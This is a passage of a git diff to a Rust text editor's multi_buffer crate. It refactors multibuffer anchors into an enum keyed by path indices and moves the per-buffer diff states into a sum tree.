+#[derive(Debug, Serialize, Deserialize)] +pub struct StreamOptions { + #[serde(default, skip_serializing_if = "Option::is_none")] + pub stream_tool_calls: Option, +} + #[derive(Debug, Serialize, Deserialize)] #[serde(rename_all = "snake_case")] pub enum ResponseFormat { diff --git a/crates/multi_buffer/Cargo.toml b/crates/multi_buffer/Cargo.toml index 524c916682f4d17b4e4b598a9af158e259b40ffc..a06599999c8147dc464128ad8ab5e6bf5ad5755b 100644 --- a/crates/multi_buffer/Cargo.toml +++ b/crates/multi_buffer/Cargo.toml @@ -45,6 +45,7 @@ tree-sitter.workspace = true ztracing.workspace = true tracing.workspace = true util.workspace = true +unicode-segmentation.workspace = true [dev-dependencies] buffer_diff = { workspace = true, features = ["test-support"] } @@ -52,7 +53,6 @@ gpui = { workspace = true, features = ["test-support"] } indoc.workspace = true language = { workspace = true, features = ["test-support"] } pretty_assertions.workspace = true -project = { workspace = true, features = ["test-support"] } rand.workspace = true settings = { workspace = true, features = ["test-support"] } text = { workspace = true, features = ["test-support"] } diff --git a/crates/multi_buffer/src/anchor.rs b/crates/multi_buffer/src/anchor.rs index 8ae154148379f7cb7d806196a03b354e2f6130c5..08b159effafa2f34dbf1b10768bf356aaf74ae31 100644 --- a/crates/multi_buffer/src/anchor.rs +++ b/crates/multi_buffer/src/anchor.rs @@ -1,195 +1,331 @@ -use crate::{MultiBufferDimension, MultiBufferOffset, MultiBufferOffsetUtf16}; +use crate::{ + ExcerptSummary, MultiBufferDimension, MultiBufferOffset, MultiBufferOffsetUtf16, PathKey, + PathKeyIndex, find_diff_state, +}; -use super::{ExcerptId, MultiBufferSnapshot, ToOffset, ToPoint}; -use language::Point; +use super::{MultiBufferSnapshot, ToOffset, ToPoint}; +use language::{BufferSnapshot, Point}; use std::{ cmp::Ordering, ops::{Add, AddAssign, Range, Sub}, }; use sum_tree::Bias; +use text::BufferId; + +/// A multibuffer anchor derived from an anchor into a specific excerpted buffer. +#[derive(Clone, Copy, Debug, Eq, PartialEq, Hash)] +pub struct ExcerptAnchor { + pub(crate) text_anchor: text::Anchor, + pub(crate) path: PathKeyIndex, + pub(crate) diff_base_anchor: Option, +} /// A stable reference to a position within a [`MultiBuffer`](super::MultiBuffer). /// /// Unlike simple offsets, anchors remain valid as the text is edited, automatically /// adjusting to reflect insertions and deletions around them. #[derive(Clone, Copy, Eq, PartialEq, Hash)] -pub struct Anchor { - /// Identifies which excerpt within the multi-buffer this anchor belongs to. - /// A multi-buffer can contain multiple excerpts from different buffers. - pub excerpt_id: ExcerptId, - /// The position within the excerpt's underlying buffer. This is a stable - /// reference that remains valid as the buffer text is edited. - pub text_anchor: text::Anchor, - /// When present, indicates this anchor points into deleted text within an - /// expanded diff hunk. The anchor references a position in the diff base - /// (original) text rather than the current buffer text. This is used when - /// displaying inline diffs where deleted lines are shown. - pub diff_base_anchor: Option, +pub enum Anchor { + /// An anchor that always resolves to the start of the multibuffer. + Min, + /// An anchor that's attached to a specific excerpted buffer. + Excerpt(ExcerptAnchor), + /// An anchor that always resolves to the end of the multibuffer. + Max, } -impl std::fmt::Debug for Anchor { +pub(crate) enum AnchorSeekTarget { + Excerpt { + path_key: PathKey, + anchor: ExcerptAnchor, + // None when the buffer no longer exists in the multibuffer + snapshot: Option, + }, + Empty, +} + +impl std::fmt::Debug for AnchorSeekTarget { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { - if self.is_min() { - return write!(f, "Anchor::min({:?})", self.text_anchor.buffer_id); + match self { + Self::Excerpt { + path_key, + anchor, + snapshot: _, + } => f + .debug_struct("Excerpt") + .field("path_key", path_key) + .field("anchor", anchor) + .finish(), + Self::Empty => write!(f, "Empty"), } - if self.is_max() { - return write!(f, "Anchor::max({:?})", self.text_anchor.buffer_id); + } +} + +impl std::fmt::Debug for Anchor { + fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { + match self { + Anchor::Min => write!(f, "Anchor::Min"), + Anchor::Max => write!(f, "Anchor::Max"), + Anchor::Excerpt(excerpt_anchor) => write!(f, "{excerpt_anchor:?}"), } + } +} - f.debug_struct("Anchor") - .field("excerpt_id", &self.excerpt_id) - .field("text_anchor", &self.text_anchor) - .field("diff_base_anchor", &self.diff_base_anchor) - .finish() +impl From for Anchor { + fn from(anchor: ExcerptAnchor) -> Self { + Anchor::Excerpt(anchor) } } -impl Anchor { - pub fn with_diff_base_anchor(self, diff_base_anchor: text::Anchor) -> Self { - Self { - diff_base_anchor: Some(diff_base_anchor), - ..self +impl ExcerptAnchor { + pub(crate) fn buffer_id(&self) -> BufferId { + self.text_anchor.buffer_id + } + + pub(crate) fn text_anchor(&self) -> text::Anchor { + self.text_anchor + } + + pub(crate) fn with_diff_base_anchor(mut self, diff_base_anchor: text::Anchor) -> Self { + self.diff_base_anchor = Some(diff_base_anchor); + self + } + + pub(crate) fn cmp(&self, other: &Self, snapshot: &MultiBufferSnapshot) -> Ordering { + let Some(self_path_key) = snapshot.path_keys_by_index.get(&self.path) else { + panic!("anchor's path was never added to multibuffer") + }; + let Some(other_path_key) = snapshot.path_keys_by_index.get(&other.path) else { + panic!("anchor's path was never added to multibuffer") + }; + + if self_path_key.cmp(other_path_key) != Ordering::Equal { + return self_path_key.cmp(other_path_key); + } + + // in the case that you removed the buffer containing self, + // and added the buffer containing other with the same path key + // (ordering is arbitrary but consistent) + if self.text_anchor.buffer_id != other.text_anchor.buffer_id { + return self.text_anchor.buffer_id.cmp(&other.text_anchor.buffer_id); + } + + let Some(buffer) = snapshot.buffer_for_path(&self_path_key) else { + return Ordering::Equal; + }; + // Comparing two anchors into buffer A that formerly existed at path P, + // when path P has since been reused for a different buffer B + if buffer.remote_id() != self.text_anchor.buffer_id { + return Ordering::Equal; + }; + assert_eq!(self.text_anchor.buffer_id, buffer.remote_id()); + let text_cmp = self.text_anchor().cmp(&other.text_anchor(), buffer); + if text_cmp != Ordering::Equal { + return text_cmp; + } + + if (self.diff_base_anchor.is_some() || other.diff_base_anchor.is_some()) + && let Some(base_text) = find_diff_state(&snapshot.diffs, self.text_anchor.buffer_id) + .map(|diff| diff.base_text()) + { + let self_anchor = self.diff_base_anchor.filter(|a| a.is_valid(base_text)); + let other_anchor = other.diff_base_anchor.filter(|a| a.is_valid(base_text)); + return match (self_anchor, other_anchor) { + (Some(a), Some(b)) => a.cmp(&b, base_text), + (Some(_), None) => match other.text_anchor().bias { + Bias::Left => Ordering::Greater, + Bias::Right => Ordering::Less, + }, + (None, Some(_)) => match self.text_anchor().bias { + Bias::Left => Ordering::Less, + Bias::Right => Ordering::Greater, + }, + (None, None) => Ordering::Equal, + }; } + + Ordering::Equal } - pub fn in_buffer(excerpt_id: ExcerptId, text_anchor: text::Anchor) -> Self { - Self { - excerpt_id, - text_anchor, - diff_base_anchor: None, + fn bias_left(&self, snapshot: &MultiBufferSnapshot) -> Self { + if self.text_anchor.bias == Bias::Left { + return *self; + } + let Some(buffer) = snapshot.buffer_for_id(self.text_anchor.buffer_id) else { + return *self; + }; + let text_anchor = self.text_anchor().bias_left(&buffer); + let ret = Self::in_buffer(self.path, text_anchor); + if let Some(diff_base_anchor) = self.diff_base_anchor { + if let Some(diff) = find_diff_state(&snapshot.diffs, self.text_anchor.buffer_id) + && diff_base_anchor.is_valid(&diff.base_text()) + { + ret.with_diff_base_anchor(diff_base_anchor.bias_left(diff.base_text())) + } else { + ret.with_diff_base_anchor(diff_base_anchor) + } + } else { + ret } } - pub fn range_in_buffer(excerpt_id: ExcerptId, range: Range) -> Range { - Self::in_buffer(excerpt_id, range.start)..Self::in_buffer(excerpt_id, range.end) + fn bias_right(&self, snapshot: &MultiBufferSnapshot) -> Self { + if self.text_anchor.bias == Bias::Right { + return *self; + } + let Some(buffer) = snapshot.buffer_for_id(self.text_anchor.buffer_id) else { + return *self; + }; + let text_anchor = self.text_anchor().bias_right(&buffer); + let ret = Self::in_buffer(self.path, text_anchor); + if let Some(diff_base_anchor) = self.diff_base_anchor { + if let Some(diff) = find_diff_state(&snapshot.diffs, self.text_anchor.buffer_id) + && diff_base_anchor.is_valid(&diff.base_text()) + { + ret.with_diff_base_anchor(diff_base_anchor.bias_right(diff.base_text())) + } else { + ret.with_diff_base_anchor(diff_base_anchor) + } + } else { + ret + } } - pub fn min() -> Self { - Self { - excerpt_id: ExcerptId::min(), - text_anchor: text::Anchor::MIN, + #[track_caller] + pub(crate) fn in_buffer(path: PathKeyIndex, text_anchor: text::Anchor) -> Self { + ExcerptAnchor { + path, diff_base_anchor: None, + text_anchor, } } - pub fn max() -> Self { - Self { - excerpt_id: ExcerptId::max(), - text_anchor: text::Anchor::MAX, - diff_base_anchor: None, + fn is_valid(&self, snapshot: &MultiBufferSnapshot) -> bool { + let Some(target) = self.try_seek_target(snapshot) else { + return false; + }; + let Some(buffer_snapshot) = snapshot.buffer_for_id(self.buffer_id()) else { + return false; + }; + // Early check to avoid invalid comparisons when seeking + if !buffer_snapshot.can_resolve(&self.text_anchor) { + return false; } + let mut cursor = snapshot.excerpts.cursor::(()); + cursor.seek(&target, Bias::Left); + let Some(excerpt) = cursor.item() else { + return false; + }; + let is_valid = self.text_anchor == excerpt.range.context.start + || self.text_anchor == excerpt.range.context.end + || self.text_anchor.is_valid(&buffer_snapshot); + is_valid + && excerpt + .range + .context + .start + .cmp(&self.text_anchor(), buffer_snapshot) + .is_le() + && excerpt + .range + .context + .end + .cmp(&self.text_anchor(), buffer_snapshot) + .is_ge() + } + + pub(crate) fn seek_target(&self, snapshot: &MultiBufferSnapshot) -> AnchorSeekTarget { + self.try_seek_target(snapshot) + .expect("anchor is from different multi-buffer") + } + + pub(crate) fn try_seek_target( + &self, + snapshot: &MultiBufferSnapshot, + ) -> Option { + let path_key = snapshot.try_path_for_anchor(*self)?; + let buffer = snapshot.buffer_for_path(&path_key).cloned(); + Some(AnchorSeekTarget::Excerpt { + path_key, + anchor: *self, + snapshot: buffer, + }) + } +} + +impl ToOffset for ExcerptAnchor { + fn to_offset(&self, snapshot: &MultiBufferSnapshot) -> MultiBufferOffset { + Anchor::from(*self).to_offset(snapshot) + } + + fn to_offset_utf16(&self, snapshot: &MultiBufferSnapshot) -> MultiBufferOffsetUtf16 { + Anchor::from(*self).to_offset_utf16(snapshot) + } +} + +impl ToPoint for ExcerptAnchor { + fn to_point(&self, snapshot: &MultiBufferSnapshot) -> Point { + Anchor::from(*self).to_point(snapshot) } + fn to_point_utf16(&self, snapshot: &MultiBufferSnapshot) -> rope::PointUtf16 { + Anchor::from(*self).to_point_utf16(snapshot) + } +} + +impl Anchor { pub fn is_min(&self) -> bool { - self.excerpt_id == ExcerptId::min() - && self.text_anchor.is_min() - && self.diff_base_anchor.is_none() + matches!(self, Self::Min) } pub fn is_max(&self) -> bool { - self.excerpt_id == ExcerptId::max() - && self.text_anchor.is_max() - && self.diff_base_anchor.is_none() + matches!(self, Self::Max) } - pub fn cmp(&self, other: &Anchor, snapshot: &MultiBufferSnapshot) -> Ordering { - if self == other { - return Ordering::Equal; - } + pub(crate) fn in_buffer(path: PathKeyIndex, text_anchor: text::Anchor) -> Self { + Self::Excerpt(ExcerptAnchor::in_buffer(path, text_anchor)) + } - let self_excerpt_id = snapshot.latest_excerpt_id(self.excerpt_id); - let other_excerpt_id = snapshot.latest_excerpt_id(other.excerpt_id); + pub(crate) fn range_in_buffer(path: PathKeyIndex, range: Range) -> Range { + Self::in_buffer(path, range.start)..Self::in_buffer(path, range.end) + } - let excerpt_id_cmp = self_excerpt_id.cmp(&other_excerpt_id, snapshot); - if excerpt_id_cmp.is_ne() { - return excerpt_id_cmp; - } - if self_excerpt_id == ExcerptId::max() - && self.text_anchor.is_max() - && self.text_anchor.is_max() - && self.diff_base_anchor.is_none() - && other.diff_base_anchor.is_none() - { - return Ordering::Equal; - } - if let Some(excerpt) = snapshot.excerpt(self_excerpt_id) { - let text_cmp = self.text_anchor.cmp(&other.text_anchor, &excerpt.buffer); - if text_cmp.is_ne() { - return text_cmp; - } - if (self.diff_base_anchor.is_some() || other.diff_base_anchor.is_some()) - && let Some(base_text) = snapshot - .diffs - .get(&excerpt.buffer_id) - .map(|diff| diff.base_text()) - { - let self_anchor = self.diff_base_anchor.filter(|a| a.is_valid(base_text)); - let other_anchor = other.diff_base_anchor.filter(|a| a.is_valid(base_text)); - return match (self_anchor, other_anchor) { - (Some(a), Some(b)) => a.cmp(&b, base_text), - (Some(_), None) => match other.text_anchor.bias { - Bias::Left => Ordering::Greater, - Bias::Right => Ordering::Less, - }, - (None, Some(_)) => match self.text_anchor.bias { - Bias::Left => Ordering::Less, - Bias::Right => Ordering::Greater, - }, - (None, None) => Ordering::Equal, - }; + pub fn cmp(&self, other: &Anchor, snapshot: &MultiBufferSnapshot) -> Ordering { + match (self, other) { + (Anchor::Min, Anchor::Min) => return Ordering::Equal, + (Anchor::Max, Anchor::Max) => return Ordering::Equal, + (Anchor::Min, _) => return Ordering::Less, + (Anchor::Max, _) => return Ordering::Greater, + (_, Anchor::Max) => return Ordering::Less, + (_, Anchor::Min) => return Ordering::Greater, + (Anchor::Excerpt(self_excerpt_anchor), Anchor::Excerpt(other_excerpt_anchor)) => { + self_excerpt_anchor.cmp(other_excerpt_anchor, snapshot) } } - Ordering::Equal } pub fn bias(&self) -> Bias { - self.text_anchor.bias + match self { + Anchor::Min => Bias::Left, + Anchor::Max => Bias::Right, + Anchor::Excerpt(anchor) => anchor.text_anchor.bias, + } } pub fn bias_left(&self, snapshot: &MultiBufferSnapshot) -> Anchor { - if self.text_anchor.bias != Bias::Left - && let Some(excerpt) = snapshot.excerpt(self.excerpt_id) - { - return Self { - excerpt_id: excerpt.id, - text_anchor: self.text_anchor.bias_left(&excerpt.buffer), - diff_base_anchor: self.diff_base_anchor.map(|a| { - if let Some(base_text) = snapshot - .diffs - .get(&excerpt.buffer_id) - .map(|diff| diff.base_text()) - && a.is_valid(&base_text) - { - return a.bias_left(base_text); - } - a - }), - }; + match self { + Anchor::Min => *self, + Anchor::Max => snapshot.anchor_before(snapshot.max_point()), + Anchor::Excerpt(anchor) => Anchor::Excerpt(anchor.bias_left(snapshot)), } - *self } pub fn bias_right(&self, snapshot: &MultiBufferSnapshot) -> Anchor { - if self.text_anchor.bias != Bias::Right - && let Some(excerpt) = snapshot.excerpt(self.excerpt_id) - { - return Self { - excerpt_id: excerpt.id, - text_anchor: self.text_anchor.bias_right(&excerpt.buffer), - diff_base_anchor: self.diff_base_anchor.map(|a| { - if let Some(base_text) = snapshot - .diffs - .get(&excerpt.buffer_id) - .map(|diff| diff.base_text()) - && a.is_valid(&base_text) - { - return a.bias_right(base_text); - } - a - }), - }; + match self { + Anchor::Max => *self, + Anchor::Min => snapshot.anchor_after(Point::zero()), + Anchor::Excerpt(anchor) => Anchor::Excerpt(anchor.bias_right(snapshot)), } - *self } pub fn summary(&self, snapshot: &MultiBufferSnapshot) -> D @@ -206,16 +342,111 @@ impl Anchor { } pub fn is_valid(&self, snapshot: &MultiBufferSnapshot) -> bool { - if self.is_min() || self.is_max() { - true - } else if let Some(excerpt) = snapshot.excerpt(self.excerpt_id) { - (self.text_anchor == excerpt.range.context.start - || self.text_anchor == excerpt.range.context.end - || self.text_anchor.is_valid(&excerpt.buffer)) - && excerpt.contains(self) - } else { - false + match self { + Anchor::Min | Anchor::Max => true, + Anchor::Excerpt(excerpt_anchor) => excerpt_anchor.is_valid(snapshot), + } + } + + fn to_excerpt_anchor(&self, snapshot: &MultiBufferSnapshot) -> Option { + match self { + Anchor::Min => { + let excerpt = snapshot.excerpts.first()?; + + Some(ExcerptAnchor { + text_anchor: excerpt.range.context.start, + path: excerpt.path_key_index, + diff_base_anchor: None, + }) + } + Anchor::Excerpt(excerpt_anchor) => Some(*excerpt_anchor), + Anchor::Max => { + let excerpt = snapshot.excerpts.last()?; + + Some(ExcerptAnchor { + text_anchor: excerpt.range.context.end, + path: excerpt.path_key_index, + diff_base_anchor: None, + }) + } + } + } + + pub(crate) fn seek_target(&self, snapshot: &MultiBufferSnapshot) -> AnchorSeekTarget { + let Some(excerpt_anchor) = self.to_excerpt_anchor(snapshot) else { + return AnchorSeekTarget::Empty; + }; + + excerpt_anchor.seek_target(snapshot) + } + + pub(crate) fn excerpt_anchor(&self) -> Option { + match self { + Anchor::Min | Anchor::Max => None, + Anchor::Excerpt(excerpt_anchor) => Some(*excerpt_anchor), + } + } + + pub(crate) fn text_anchor(&self) -> Option { + match self { + Anchor::Min | Anchor::Max => None, + Anchor::Excerpt(excerpt_anchor) => Some(excerpt_anchor.text_anchor()), + } + } + + pub fn opaque_id(&self) -> Option<[u8; 20]> { + self.text_anchor().map(|a| a.opaque_id()) + } + + /// Note: anchor_to_buffer_anchor is probably what you want + pub fn raw_text_anchor(&self) -> Option { + match self { + Anchor::Min | Anchor::Max => None, + Anchor::Excerpt(excerpt_anchor) => Some(excerpt_anchor.text_anchor), + } + } + + pub(crate) fn try_seek_target( + &self, + snapshot: &MultiBufferSnapshot, + ) -> Option { + let Some(excerpt_anchor) = self.to_excerpt_anchor(snapshot) else { + return Some(AnchorSeekTarget::Empty); + }; + excerpt_anchor.try_seek_target(snapshot) + } + + /// Returns the text anchor for this anchor. + /// Panics if the anchor is from a different buffer. + pub fn text_anchor_in(&self, buffer: &BufferSnapshot) -> text::Anchor { + match self { + Anchor::Min => text::Anchor::min_for_buffer(buffer.remote_id()), + Anchor::Excerpt(excerpt_anchor) => { + let text_anchor = excerpt_anchor.text_anchor; + assert_eq!(text_anchor.buffer_id, buffer.remote_id()); + text_anchor + } + Anchor::Max => text::Anchor::max_for_buffer(buffer.remote_id()), + } + } + + pub fn diff_base_anchor(&self) -> Option { + self.excerpt_anchor()?.diff_base_anchor + } + + #[cfg(any(test, feature = "test-support"))] + pub fn expect_text_anchor(&self) -> text::Anchor { + self.excerpt_anchor().unwrap().text_anchor + } + + pub fn with_diff_base_anchor(mut self, diff_base_anchor: text::Anchor) -> Self { + match &mut self { + Anchor::Min | Anchor::Max => {} + Anchor::Excerpt(excerpt_anchor) => { + excerpt_anchor.diff_base_anchor = Some(diff_base_anchor); + } } + self } } diff --git a/crates/multi_buffer/src/multi_buffer.rs b/crates/multi_buffer/src/multi_buffer.rs index a593280d245fd01d623051953e48128c9935df45..a54ff64af028f44adced1758933f794e9a002c5a 100644 --- a/crates/multi_buffer/src/multi_buffer.rs +++ b/crates/multi_buffer/src/multi_buffer.rs @@ -8,6 +8,7 @@ use self::transaction::History; pub use anchor::{Anchor, AnchorRangeExt}; +use anchor::{AnchorSeekTarget, ExcerptAnchor}; use anyhow::{Result, anyhow}; use buffer_diff::{ BufferDiff, BufferDiffEvent, BufferDiffSnapshot, DiffChanged, DiffHunkSecondaryStatus, @@ -15,28 +16,30 @@ use buffer_diff::{ }; use clock::ReplicaId; use collections::{BTreeMap, Bound, HashMap, HashSet}; -use gpui::{App, Context, Entity, EntityId, EventEmitter}; +use gpui::{App, Context, Entity, EventEmitter}; use itertools::Itertools; use language::{ - AutoindentMode, BracketMatch, Buffer, BufferChunks, BufferRow, BufferSnapshot, Capability, - CharClassifier, CharKind, CharScopeContext, Chunk, CursorShape, DiagnosticEntryRef, File, - IndentGuideSettings, IndentSize, Language, LanguageScope, OffsetRangeExt, OffsetUtf16, Outline, - OutlineItem, Point, PointUtf16, Selection, TextDimension, TextObject, ToOffset as _, - ToPoint as _, TransactionId, TreeSitterOptions, Unclipped, - language_settings::{LanguageSettings, language_settings}, + AutoindentMode, Buffer, BufferChunks, BufferRow, BufferSnapshot, Capability, CharClassifier, + CharKind, CharScopeContext, Chunk, CursorShape, DiagnosticEntryRef, File, IndentGuideSettings, + IndentSize, Language, LanguageScope, OffsetRangeExt, OffsetUtf16, Outline, OutlineItem, Point, + PointUtf16, Selection, TextDimension, TextObject, ToOffset as _, ToPoint as _, TransactionId, + TreeSitterOptions, Unclipped, + language_settings::{AllLanguageSettings, LanguageSettings}, }; #[cfg(any(test, feature = "test-support"))] use gpui::AppContext as _; use rope::DimensionPair; +use settings::Settings; use smallvec::SmallVec; use smol::future::yield_now; use std::{ any::type_name, borrow::Cow, cell::{Cell, OnceCell, Ref, RefCell}, - cmp, fmt, + cmp::{self, Ordering}, + fmt, future::Future, io, iter::{self, FromIterator}, @@ -50,14 +53,13 @@ use std::{ use sum_tree::{Bias, Cursor, Dimension, Dimensions, SumTree, TreeMap}; use text::{ BufferId, Edit, LineIndent, TextSummary, - locator::Locator, subscription::{Subscription, Topic}, }; use theme::SyntaxTheme; -use util::post_inc; +use unicode_segmentation::UnicodeSegmentation; use ztracing::instrument; -pub use self::path_key::{PathExcerptInsertResult, PathKey}; +pub use self::path_key::PathKey; pub static EXCERPT_CONTEXT_LINES: OnceLock u32> = OnceLock::new(); @@ -65,9 +67,6 @@ pub fn excerpt_context_lines(cx: &App) -> u32 { EXCERPT_CONTEXT_LINES.get().map(|f| f(cx)).unwrap_or(2) } -#[derive(Debug, Default, Clone, Copy, Hash, PartialEq, Eq, PartialOrd, Ord)] -pub struct ExcerptId(u32); - /// One or more [`Buffers`](Buffer) being edited in a single view. /// /// See @@ -77,10 +76,6 @@ pub struct MultiBuffer { snapshot: RefCell, /// Contains the state of the buffers being edited buffers: BTreeMap, - /// Mapping from path keys to their excerpts. - excerpts_by_path: BTreeMap>, - /// Mapping from excerpt IDs to their path key. - paths_by_excerpt: HashMap, /// Mapping from buffer IDs to their diff states diffs: HashMap, subscriptions: Topic, @@ -96,27 +91,26 @@ pub struct MultiBuffer { buffer_changed_since_sync: Rc>, } +#[derive(Clone, Copy, Debug, PartialEq, Eq, PartialOrd, Ord, Hash)] +struct PathKeyIndex(u64); + #[derive(Clone, Debug, PartialEq, Eq)] pub enum Event { - ExcerptsAdded { + BufferRangesUpdated { buffer: Entity, - predecessor: ExcerptId, - excerpts: Vec<(ExcerptId, ExcerptRange)>, + path_key: PathKey, + ranges: Vec>, }, - ExcerptsRemoved { - ids: Vec, + BuffersRemoved { removed_buffer_ids: Vec, }, - ExcerptsExpanded { - ids: Vec, - }, - ExcerptsEdited { - excerpt_ids: Vec, + BuffersEdited { buffer_ids: Vec, }, DiffHunksToggled, Edited { edited_buffer: Option>, + is_local: bool, }, TransactionUndone { transaction_id: TransactionId, @@ -140,14 +134,14 @@ pub struct MultiBufferDiffHunk { pub buffer_id: BufferId, /// The range of the underlying buffer that this hunk corresponds to. pub buffer_range: Range, - /// The excerpt that contains the diff hunk. - pub excerpt_id: ExcerptId, /// The range within the buffer's diff base that this hunk corresponds to. pub diff_base_byte_range: Range, /// The status of this hunk (added/modified/deleted and secondary status). pub status: DiffHunkStatus, /// The word diffs for this hunk. pub word_diffs: Vec>, + pub excerpt_range: ExcerptRange, + pub multi_buffer_range: Range, } impl MultiBufferDiffHunk { @@ -160,17 +154,12 @@ impl MultiBufferDiffHunk { && self.buffer_range.start.is_min() && self.buffer_range.end.is_max() } - - pub fn multi_buffer_range(&self) -> Range { - let start = Anchor::in_buffer(self.excerpt_id, self.buffer_range.start); - let end = Anchor::in_buffer(self.excerpt_id, self.buffer_range.end); - start..end - } } pub type MultiBufferPoint = Point; +/// ExcerptOffset is offset into the non-deleted text of the multibuffer type ExcerptOffset = ExcerptDimension; -type ExcerptPoint = ExcerptDimension; +/// ExcerptOffset is based on the non-deleted text of the multibuffer #[derive(Copy, Clone, Debug, Default, Eq, Ord, PartialOrd, PartialEq, Hash, serde::Deserialize)] #[serde(transparent)] @@ -513,10 +502,6 @@ pub trait ToPoint: 'static + fmt::Debug { struct BufferState { buffer: Entity, - last_version: RefCell, - last_non_text_state_update_count: Cell, - // Note, any changes to this field value require updating snapshot.buffer_locators as well - excerpts: Vec, _subscriptions: [gpui::Subscription; 2], } @@ -527,8 +512,9 @@ struct DiffState { } impl DiffState { - fn snapshot(&self, cx: &App) -> DiffStateSnapshot { + fn snapshot(&self, buffer_id: BufferId, cx: &App) -> DiffStateSnapshot { DiffStateSnapshot { + buffer_id, diff: self.diff.read(cx).snapshot(cx), main_buffer: self.main_buffer.as_ref().map(|b| b.read(cx).snapshot()), } @@ -537,6 +523,7 @@ impl DiffState { #[derive(Clone)] struct DiffStateSnapshot { + buffer_id: BufferId, diff: BufferDiffSnapshot, main_buffer: Option, } @@ -549,6 +536,77 @@ impl std::ops::Deref for DiffStateSnapshot { } } +#[derive(Clone, Debug, Default)] +struct DiffStateSummary { + max_buffer_id: Option, + added_rows: u32, + removed_rows: u32, +} + +impl sum_tree::ContextLessSummary for DiffStateSummary { + fn zero() -> Self { + Self::default() + } + + fn add_summary(&mut self, other: &Self) { + self.max_buffer_id = std::cmp::max(self.max_buffer_id, other.max_buffer_id); + self.added_rows += other.added_rows; + self.removed_rows += other.removed_rows; + } +} + +impl sum_tree::Item for DiffStateSnapshot { + type Summary = DiffStateSummary; + + fn summary(&self, _cx: ()) -> DiffStateSummary { + let (added_rows, removed_rows) = self.diff.changed_row_counts(); + DiffStateSummary { + max_buffer_id: Some(self.buffer_id), + added_rows, + removed_rows, + } + } +} + +impl sum_tree::KeyedItem for DiffStateSnapshot { + type Key = Option; + + fn key(&self) -> Option { + Some(self.buffer_id) + } +} + +impl<'a> Dimension<'a, DiffStateSummary> for Option { + fn zero(_cx: ()) -> Self { + None + } + + fn add_summary(&mut self, summary: &DiffStateSummary, _cx: ()) { + *self = std::cmp::max(*self, summary.max_buffer_id); + } +} + +fn find_diff_state( + diffs: &SumTree, + buffer_id: BufferId, +) -> Option<&DiffStateSnapshot> { + let key = Some(buffer_id); + let (.., item) = diffs.find::, _>((), &key, Bias::Left); + item.filter(|entry| entry.buffer_id == buffer_id) +} + +fn remove_diff_state(diffs: &mut SumTree, buffer_id: BufferId) { + let key = Some(buffer_id); + let mut cursor = diffs.cursor::>(()); + let mut new_tree = cursor.slice(&key, Bias::Left); + if key == cursor.end() { + cursor.next(); + } + new_tree.append(cursor.suffix(), ()); + drop(cursor); + *diffs = new_tree; +} + impl DiffState { fn new(diff: Entity, cx: &mut Context) -> Self { DiffState { @@ -616,15 +674,31 @@ impl DiffState { } } +#[derive(Clone)] +struct BufferStateSnapshot { + path_key: PathKey, + path_key_index: PathKeyIndex, + buffer_snapshot: BufferSnapshot, +} + +impl fmt::Debug for BufferStateSnapshot { + fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { + f.debug_struct("BufferStateSnapshot") + .field("path_key", &self.path_key) + .field("buffer_id", &self.buffer_snapshot.remote_id()) + .finish() + } +} + /// The contents of a [`MultiBuffer`] at a single point in time. #[derive(Clone, Default)] pub struct MultiBufferSnapshot { excerpts: SumTree, - buffer_locators: TreeMap>, - diffs: TreeMap, + buffers: TreeMap, + path_keys_by_index: TreeMap, + indices_by_path_key: TreeMap, + diffs: SumTree, diff_transforms: SumTree, - excerpt_ids: SumTree, - replaced_excerpts: Arc>, non_text_state_update_count: usize, edit_count: usize, is_dirty: bool, @@ -639,24 +713,12 @@ pub struct MultiBufferSnapshot { show_headers: bool, } -// follower: None -// - BufferContent(Some) -// - BufferContent(None) -// - DeletedHunk -// -// follower: Some -// - BufferContent(Some) -// - BufferContent(None) - #[derive(Debug, Clone)] enum DiffTransform { - // RealText BufferContent { summary: MBTextSummary, - // modified_hunk_info inserted_hunk_info: Option, }, - // ExpandedHunkText DeletedHunk { summary: TextSummary, buffer_id: BufferId, @@ -668,52 +730,71 @@ enum DiffTransform { #[derive(Clone, Copy, Debug)] struct DiffTransformHunkInfo { - excerpt_id: ExcerptId, + buffer_id: BufferId, hunk_start_anchor: text::Anchor, hunk_secondary_status: DiffHunkSecondaryStatus, is_logically_deleted: bool, + excerpt_end: ExcerptAnchor, } impl Eq for DiffTransformHunkInfo {} impl PartialEq for DiffTransformHunkInfo { fn eq(&self, other: &DiffTransformHunkInfo) -> bool { - self.excerpt_id == other.excerpt_id && self.hunk_start_anchor == other.hunk_start_anchor + self.buffer_id == other.buffer_id && self.hunk_start_anchor == other.hunk_start_anchor } } impl std::hash::Hash for DiffTransformHunkInfo { fn hash(&self, state: &mut H) { - self.excerpt_id.hash(state); + self.buffer_id.hash(state); self.hunk_start_anchor.hash(state); } } #[derive(Clone)] -pub struct ExcerptInfo { - pub id: ExcerptId, - pub buffer: Arc, - pub buffer_id: BufferId, +pub struct ExcerptBoundaryInfo { + pub start_anchor: Anchor, pub range: ExcerptRange, pub end_row: MultiBufferRow, } -impl std::fmt::Debug for ExcerptInfo { +impl ExcerptBoundaryInfo { + pub fn start_text_anchor(&self) -> text::Anchor { + self.range.context.start + } + pub fn buffer_id(&self) -> BufferId { + self.start_text_anchor().buffer_id + } + pub fn buffer<'a>(&self, snapshot: &'a MultiBufferSnapshot) -> &'a BufferSnapshot { + snapshot + .buffer_for_id(self.buffer_id()) + .expect("buffer snapshot not found for excerpt boundary") + } +} + +impl std::fmt::Debug for ExcerptBoundaryInfo { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { f.debug_struct(type_name::()) - .field("id", &self.id) - .field("buffer_id", &self.buffer_id) - .field("path", &self.buffer.file().map(|f| f.path())) + .field("buffer_id", &self.buffer_id()) .field("range", &self.range) .finish() } } +impl PartialEq for ExcerptBoundaryInfo { + fn eq(&self, other: &Self) -> bool { + self.start_anchor == other.start_anchor && self.range == other.range + } +} + +impl Eq for ExcerptBoundaryInfo {} + /// A boundary between `Excerpt`s in a [`MultiBuffer`] #[derive(Debug)] pub struct ExcerptBoundary { - pub prev: Option, - pub next: ExcerptInfo, + pub prev: Option, + pub next: ExcerptBoundaryInfo, /// The row in the `MultiBuffer` where the boundary is located pub row: MultiBufferRow, } @@ -722,7 +803,7 @@ impl ExcerptBoundary { pub fn starts_new_buffer(&self) -> bool { match (self.prev.as_ref(), &self.next) { (None, 